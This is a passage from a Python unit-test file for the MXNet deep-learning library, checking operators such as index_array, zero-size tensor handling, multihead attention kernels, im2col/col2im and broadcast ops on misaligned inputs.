rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, alpha, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
hight = 1
assertRaises(MXNetError, mx.nd.random_uniform, alpha, beta, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
